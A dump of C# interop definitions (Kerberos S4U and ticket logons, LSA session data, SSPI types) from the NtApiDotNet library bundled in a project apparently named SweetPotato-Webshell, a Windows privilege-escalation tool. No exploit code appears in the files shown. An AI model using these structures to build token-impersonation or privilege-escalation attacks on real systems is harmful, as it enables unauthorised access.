        public IntPtr CAPID;                 // Presumably a PSID identifying the policy - confirm.
        public UnicodeStringOut Name;
        public UnicodeStringOut Description;
        public UnicodeStringOut ChangeId;
        public uint Flags;
        public int CAPECount;                // Number of entries referenced by CAPEs.
        public IntPtr CAPEs; // PCENTRAL_ACCESS_POLICY_ENTRY
    }
}
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/CENTRAL_ACCESS_POLICY_ENTRY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native CENTRAL_ACCESS_POLICY_ENTRY structure, one
    /// rule of a central access policy.
    /// </summary>
    /// <remarks>
    /// Each Length*/pointer pair describes a variable-sized unmanaged blob.
    /// Readers should validate the length before copying and should parse the
    /// copied bytes rather than trusting the blob to be well formed.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct CENTRAL_ACCESS_POLICY_ENTRY
    {
        public UnicodeStringOut Name;
        public UnicodeStringOut Description;
        public UnicodeStringOut ChangeId;
        public int LengthAppliesTo;  // Byte length of the AppliesTo blob.
        public IntPtr AppliesTo;     // Presumably the applies-to condition bytes - confirm.
        public int LengthSD;         // Byte length of SD.
        public IntPtr SD;            // Presumably a self-relative security descriptor - confirm.
        public int LengthStagedSD;   // Byte length of StagedSD.
        public IntPtr StagedSD;      // Presumably the staged (proposed) security descriptor - confirm.
        public uint Flags;
    }
}
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/INHERITED_FROM.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the Win32 INHERITED_FROM structure, which reports
    /// where an inherited ACE came from.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    internal struct INHERITED_FROM
    {
        public int GenerationGap;   // Number of levels between the object and the ancestor (native LONG).
        public IntPtr AncestorName; // Native string pointer; copy the text before the native array is freed.
    }
}
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/KERB_LOGON_SUBMIT_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Message type placed at the start of a Kerberos logon submission buffer.
    /// </summary>
    /// <remarks>
    /// The values are fixed by the native definition and are not contiguous;
    /// do not renumber them.
    /// </remarks>
    internal enum KERB_LOGON_SUBMIT_TYPE
    {
        KerbInteractiveLogon = 2,
        KerbSmartCardLogon = 6,
        KerbWorkstationUnlockLogon = 7,
        KerbSmartCardUnlockLogon = 8,
        KerbProxyLogon = 9,
        KerbTicketLogon = 10,
        KerbTicketUnlockLogon = 11,
        KerbS4ULogon = 12,
        KerbCertificateLogon = 13,
        KerbCertificateS4ULogon = 14,
        KerbCertificateUnlockLogon = 15,
        KerbNoElevationLogon = 83,
        KerbLuidLogon = 84,
    }
}
34 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/KERB_S4U_LOGON.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native KERB_S4U_LOGON structure, the submission
    /// buffer for a Service-for-User (S4U) logon.
    /// </summary>
    /// <remarks>
    /// An S4U logon names a user without supplying that user's credentials.
    /// Reviewers should check which callers can reach code that builds this
    /// structure and what privileges they hold, since that decides how usable
    /// the resulting token is.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct KERB_S4U_LOGON
    {
        public KERB_LOGON_SUBMIT_TYPE MessageType; // Presumably KerbS4ULogon for this layout - confirm against callers.
        public int Flags;
        public UnicodeStringOut ClientUpn;         // User principal name of the account to log on.
        public UnicodeStringOut ClientRealm;       // Realm (domain) of that account.
    }
}
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/KERB_TICKET_LOGON.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native KERB_TICKET_LOGON structure, the submission
    /// buffer for a logon performed with existing Kerberos tickets.
    /// </summary>
    /// <remarks>
    /// The ticket buffers are credential material. Whoever allocates them
    /// should keep the lengths consistent with the allocations and clear and
    /// free the buffers once the native call returns.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct KERB_TICKET_LOGON
    {
        public KERB_LOGON_SUBMIT_TYPE MessageType; // Presumably KerbTicketLogon or KerbTicketUnlockLogon - confirm against callers.
        public int Flags;
        public int ServiceTicketLength;            // Byte length of ServiceTicket.
        public int TicketGrantingTicketLength;     // Byte length of TicketGrantingTicket (0 when absent).
        public IntPtr ServiceTicket;               // Unmanaged pointer to the service ticket bytes.
        public IntPtr TicketGrantingTicket;        // Unmanaged pointer to the TGT bytes, or IntPtr.Zero.
    }
}
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LSA_ENUMERATION_INFORMATION.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native LSA_ENUMERATION_INFORMATION structure, a
    /// single element of an LSA account enumeration result.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    internal struct LSA_ENUMERATION_INFORMATION
    {
        // PSID into the LSA-allocated result buffer; copy the SID before that
        // buffer is released.
        public IntPtr Sid;
    }
}
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LSA_LAST_INTER_LOGON_INFO.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native LSA_LAST_INTER_LOGON_INFO structure, which
    /// carries last interactive logon statistics for an account.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    internal struct LSA_LAST_INTER_LOGON_INFO
    {
        public LargeIntegerStruct LastSuccessfulLogon;         // Timestamp of the last successful logon.
        public LargeIntegerStruct LastFailedLogon;             // Timestamp of the last failed logon.
        public int FailedAttemptCountSinceLastSuccessfulLogon; // Failed attempts since LastSuccessfulLogon.
    }
}
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LsaLogonUserFlags.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Logon UserFlags.
    /// </summary>
    /// <remarks>
    /// Bit flags reported for a logon session. Several of them are useful
    /// when reviewing how a session was authenticated, for example Guest,
    /// NoEncryption, CachedAccount and UsedLmPassword. Bit 0x10 is not defined
    /// by this enum.
    /// </remarks>
    [Flags]
    public enum LsaLogonUserFlags
    {
        Guest = 0x01,
        NoEncryption = 0x02,
        CachedAccount = 0x04,
        UsedLmPassword = 0x08,
        ExtraSids = 0x20,
        SubAuthSessionKey = 0x40,
        ServerTrustAccount = 0x80,
        NtlmV2Enabled = 0x100,
        ResourceGroups = 0x200,
        ProfilePathReturned = 0x400,
        NtV2 = 0x800,
        LmV2 = 0x1000,
        NtlmV2 = 0x2000,
        Optimized = 0x4000,
        WinLogon = 0x8000,
        PKInit = 0x10000,
        NoOptimized = 0x20000,
        NoElevation = 0x40000,
        ManagedService = 0x80000,
    }
}
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/LsaString.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
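namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Counted ANSI string marshalled to native code as Length, MaximumLength
    /// and a pointer to the characters.
    /// </summary>
    /// <remarks>
    /// Both length fields are 16-bit. The constructor rejects input that does
    /// not fit instead of letting the casts wrap, because a wrapped length
    /// would describe a different size than the buffer actually marshalled.
    /// NOTE(review): the lengths are taken from the UTF-16 character count; for
    /// non-ASCII input the marshalled ANSI byte count may differ - confirm that
    /// callers only pass ASCII names.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
    internal class LsaString
    {
        public ushort Length;
        public ushort MaximumLength;
        [MarshalAs(UnmanagedType.LPStr)]
        string Buffer;

        /// <summary>
        /// Builds the counted string for <paramref name="str"/>.
        /// </summary>
        /// <param name="str">Text to marshal; at most 65534 characters.</param>
        /// <exception cref="System.ArgumentNullException">str is null.</exception>
        /// <exception cref="System.ArgumentOutOfRangeException">
        /// str is too long for the 16-bit length fields.
        /// </exception>
        public LsaString(string str)
        {
            if (str == null)
            {
                throw new System.ArgumentNullException("str");
            }

            // MaximumLength is Length + 1 (room for the terminator), so the
            // largest representable Length is ushort.MaxValue - 1.
            if (str.Length > ushort.MaxValue - 1)
            {
                throw new System.ArgumentOutOfRangeException("str",
                    "String is too long for a 16-bit counted string.");
            }

            Length = (ushort)str.Length;
            MaximumLength = (ushort)(str.Length + 1);
            Buffer = str;
        }
    }
}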
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/OptionalLuid.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Reference-type wrapper around a <see cref="Luid"/>.
    /// </summary>
    /// <remarks>
    /// Presumably declared as a class so that a null reference marshals as a
    /// NULL pointer for optional LUID parameters - confirm against the
    /// P/Invoke signatures that use it.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal class OptionalLuid
    {
        public Luid luid; // The wrapped LUID value.
    }
}
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/POLICY_AUDIT_SID_ARRAY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native POLICY_AUDIT_SID_ARRAY structure, a counted
    /// array of SID pointers for per-user audit policy.
    /// </summary>
    /// <remarks>
    /// UsersCount comes from unmanaged memory; validate it before using it to
    /// index UserSidArray, and copy the SIDs before the native buffer is freed.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct POLICY_AUDIT_SID_ARRAY
    {
        public int UsersCount;      // Number of SID pointers in UserSidArray.
        public IntPtr UserSidArray; // Pointer to an array of PSID.
    }
}
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/QUOTA_LIMITS.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native QUOTA_LIMITS structure.
    /// </summary>
    /// <remarks>
    /// The size fields are pointer-sized so the layout matches on both 32-bit
    /// and 64-bit processes. Declared as a class, so it is passed by reference
    /// when used as a P/Invoke parameter.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal class QUOTA_LIMITS
    {
        public IntPtr PagedPoolLimit;        // Native SIZE_T.
        public IntPtr NonPagedPoolLimit;     // Native SIZE_T.
        public IntPtr MinimumWorkingSetSize; // Native SIZE_T.
        public IntPtr MaximumWorkingSetSize; // Native SIZE_T.
        public IntPtr PagefileLimit;         // Native SIZE_T.
        public LargeIntegerStruct TimeLimit; // Native LARGE_INTEGER.
    }
}
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SECPKG_ATTR.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Attribute selectors for querying an SSPI security context or credential.
    /// </summary>
    /// <remarks>
    /// Values are fixed by the native headers. The sequence has gaps (23, 28,
    /// 29) and SUBJECT_SECURITY_ATTRIBUTES (128) is listed out of numeric
    /// order, so members must keep their explicit values.
    /// SESSION_KEY and ACCESS_TOKEN return sensitive material; callers that
    /// query them should limit how long the result is kept.
    /// </remarks>
    internal enum SECPKG_ATTR
    {
        SIZES = 0,
        NAMES = 1,
        LIFESPAN = 2,
        DCE_INFO = 3,
        STREAM_SIZES = 4,
        KEY_INFO = 5,
        AUTHORITY = 6,
        PROTO_INFO = 7,
        PASSWORD_EXPIRY = 8,
        SESSION_KEY = 9,
        PACKAGE_INFO = 10,
        USER_FLAGS = 11,
        NEGOTIATION_INFO = 12,
        NATIVE_NAMES = 13,
        FLAGS = 14,
        USE_VALIDATED = 15,
        CREDENTIAL_NAME = 16,
        TARGET_INFORMATION = 17,
        ACCESS_TOKEN = 18,
        TARGET = 19,
        AUTHENTICATION_ID = 20,
        LOGOFF_TIME = 21,
        NEGO_KEYS = 22,
        PROMPTING_NEEDED = 24,
        UNIQUE_BINDINGS = 25,
        ENDPOINT_BINDINGS = 26,
        CLIENT_SPECIFIED_TARGET = 27,
        LAST_CLIENT_TOKEN_STATUS = 30,
        NEGO_PKG_INFO = 31,
        NEGO_STATUS = 32,
        CONTEXT_DELETED = 33,
        DTLS_MTU = 34,
        SUBJECT_SECURITY_ATTRIBUTES = 128,
        APPLICATION_PROTOCOL = 35,
        NEGOTIATED_TLS_EXTENSIONS = 36,
        IS_LOOPBACK = 37,
    }
}
57 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SECURITY_LOGON_SESSION_DATA.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native SECURITY_LOGON_SESSION_DATA structure that
    /// describes one logon session.
    /// </summary>
    /// <remarks>
    /// The string fields and Sid are pointers into the buffer LSA returned.
    /// Convert them to managed values before that buffer is freed; reading
    /// them afterwards is a use-after-free. Field order must match the native
    /// definition exactly.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct SECURITY_LOGON_SESSION_DATA
    {
        public int Size;                                // Size of the structure as reported by LSA.
        public Luid LogonId;                            // LUID that identifies the logon session.
        public UnicodeStringOut UserName;
        public UnicodeStringOut LogonDomain;
        public UnicodeStringOut AuthenticationPackage;  // Package that authenticated the session.
        public SecurityLogonType LogonType;
        public int Session;                             // Terminal Services session id.
        public IntPtr Sid;                              // PSID of the user; unmanaged pointer.
        public LargeIntegerStruct LogonTime;
        public UnicodeStringOut LogonServer;
        public UnicodeStringOut DnsDomainName;
        public UnicodeStringOut Upn;
        public LsaLogonUserFlags UserFlags;
        public LSA_LAST_INTER_LOGON_INFO LastLogonInfo;
        public UnicodeStringOut LogonScript;
        public UnicodeStringOut ProfilePath;
        public UnicodeStringOut HomeDirectory;
        public UnicodeStringOut HomeDirectoryDrive;
        public LargeIntegerStruct LogoffTime;
        public LargeIntegerStruct KickOffTime;
        public LargeIntegerStruct PasswordLastSet;
        public LargeIntegerStruct PasswordCanChange;
        public LargeIntegerStruct PasswordMustChange;
    }
}
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SEC_CHANNEL_BINDING.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native SEC_CHANNEL_BINDINGS header used to pass
    /// channel binding data to SSPI.
    /// </summary>
    /// <remarks>
    /// The structure is only a header: the address and application data follow
    /// it in the same buffer and are located by the offset fields, which are
    /// relative to the start of the structure. Code that builds or parses the
    /// buffer must check that every offset plus its length stays inside the
    /// allocated buffer.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct SEC_CHANNEL_BINDINGS
    {
        public int dwInitiatorAddrType;
        public int cbInitiatorLength;        // Byte length of the initiator address.
        public int dwInitiatorOffset;        // Offset of the initiator address from the start of the header.
        public int dwAcceptorAddrType;
        public int cbAcceptorLength;         // Byte length of the acceptor address.
        public int dwAcceptorOffset;         // Offset of the acceptor address from the start of the header.
        public int cbApplicationDataLength;  // Byte length of the application data.
        public int dwApplicationDataOffset;  // Offset of the application data from the start of the header.
    }
}
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SEC_WINNT_AUTH_IDENTITY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 | using System.Security;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Explicit user name, domain and password handed to SSPI when acquiring
    /// credentials. Marshalled with Unicode strings.
    /// </summary>
    /// <remarks>
    /// User and Domain are ordinary managed strings. The password is carried
    /// by a SecureStringMarshal that the constructor registers with the
    /// caller's DisposableList, so its lifetime follows that list; the list
    /// must stay alive until the native call that consumes this object has
    /// returned. Field order defines the marshalled layout.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    internal class SEC_WINNT_AUTH_IDENTITY
    {
        [MarshalAs(UnmanagedType.LPWStr)]
        public string User;
        public int UserLength;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string Domain;
        public int DomainLength;
        public SecureStringMarshal Password;
        public int PasswordLength;
        public SecWinNtAuthIdentityFlags Flags;

        /// <summary>
        /// Creates an empty identity; every field keeps its default value.
        /// </summary>
        public SEC_WINNT_AUTH_IDENTITY()
        {
        }

        /// <summary>
        /// Creates an identity from the supplied credentials.
        /// </summary>
        /// <param name="user">User name, or null for none.</param>
        /// <param name="domain">Domain name, or null for none.</param>
        /// <param name="password">Password, or null to leave the password fields unset.</param>
        /// <param name="list">Resource list that takes ownership of the marshalled password.</param>
        public SEC_WINNT_AUTH_IDENTITY(string user, string domain, SecureString password, DisposableList list)
        {
            // Lengths are character counts; a missing string counts as zero.
            this.User = user;
            this.UserLength = (user == null) ? 0 : user.Length;

            this.Domain = domain;
            this.DomainLength = (domain == null) ? 0 : domain.Length;

            if (password != null)
            {
                var marshalledPassword = new SecureStringMarshal(password);
                this.Password = list.AddResource(marshalledPassword);
                this.PasswordLength = password.Length;
            }

            this.Flags = SecWinNtAuthIdentityFlags.Unicode;
        }
    }
}
53 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecBufferType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Security buffer type.
    /// </summary>
    /// <remarks>
    /// Identifies what an SSPI security buffer holds. Values are fixed by the
    /// native headers.
    /// </remarks>
    internal enum SecBufferType
    {
        Empty = 0,
        Data = 1,
        Token = 2,
        PkgParams = 3,
        Missing = 4,
        Extra = 5,
        StreamTrailer = 6,
        StreamHeader = 7,
        NegotiationInfo = 8,
        Padding = 9,
        Stream = 10,
        Mechlist = 11,
        MechlistSignature = 12,
        Target = 13,
        ChannelBindings = 14,
        ChangePassResponse = 15,
        TargetHost = 16,
        Alert = 17,
        ApplicationProtocols = 18,
        SRTPProtectionProfiles = 19,
        SRTPMasterKeyIdentifier = 20,
        TokenBinding = 21,
        PresharedKey = 22,
        PresharedKeyIdentity = 23,
        DTLAMtu = 24, // Name as spelled in this file; presumably the DTLS MTU buffer type.
    }
}
50 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Managed mirror of the native SecHandle structure, the opaque two-word
    /// handle SSPI uses for credentials and security contexts.
    /// </summary>
    /// <remarks>
    /// The two fields are opaque to callers. The handle is owned by the
    /// security package and has to be released through the matching SSPI free
    /// or delete call; the garbage collector does not do that for this type.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal class SecHandle
    {
        public IntPtr dwLower; // Pointer-sized opaque value.
